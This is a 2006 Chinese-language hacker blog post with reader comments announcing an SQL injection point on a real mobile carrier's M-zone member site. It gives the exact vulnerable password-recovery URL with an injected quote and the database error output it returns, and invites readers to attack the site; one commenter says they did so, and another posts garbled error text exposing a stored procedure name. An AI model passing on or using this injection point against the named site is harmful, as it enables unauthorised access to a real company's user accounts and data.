2006-02-25 12:29:49 by: h4x0r

M-zone 动感地带存在注入

Font Size: Large | Medium | Small
不是我发现的,有兴趣的朋友可以去日日它

注入点:
http://avatar.m-zone.com.cn/member/find_pwd.asp?UserID=sherly'

返回信息:
Microsoft VBScript 编译器错误 错误 '800a03f6'

缺少 'End'

/iisHelp/common/500-100.asp,行242

Microsoft OLE DB Provider for SQL Server 错误 '80040e14'

字符串 'sherly'' 之前有未闭合的引号。

E:\INETPUB\WWWROOT\MEMBER\../common_asp/dbcon.asp,行68
[Last Modified By h4x0r, at 2006-02-26 03:23:11]
Comments Feed Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=612

View Mode: Show All | Comments: 3 Trackbacks: 0 Toggle Order | Views: 889
Quote fleecy*
[ 2006-02-25 12:34:20 ]
目录也没有限制...
Quote Qkfang
[ 2006-02-25 15:23:35 ]
日了一次 怕被公安的日了。呵呵。
Quote fuck
[ 2006-03-09 01:08:06 ]
还日出韩语来了。。。

Microsoft VBScript 긍陋포댄轎 댄轎 '800a03f6'

홧 'End'

/iisHelp/common/500-100.asp,契242

Microsoft OLE DB Provider for SQL Server 댄轎 '80040e10'

법넋 'sp_GetPwdbyUserKey' 矜狼꽝鑒 '@key',뎃灌瓊묩맡꽝鑒。

E:\INETPUB\WWWROOT\MEMBER\../common_asp/dbcon.asp,契68

Post Comment
Smilies
[smile] [confused] [cool] [cry]
[eek] [angry] [wink] [sweat]
[lol] [stun] [razz] [redface]
[rolleyes] [sad] [yes] [no]
[heart] [star] [music] [idea]
Enable UBB Codes
Auto Convert URL
Show Smilies
Hidden Comment
Username:   Password:   Register Now?
Security Code * Please Enter the Security Code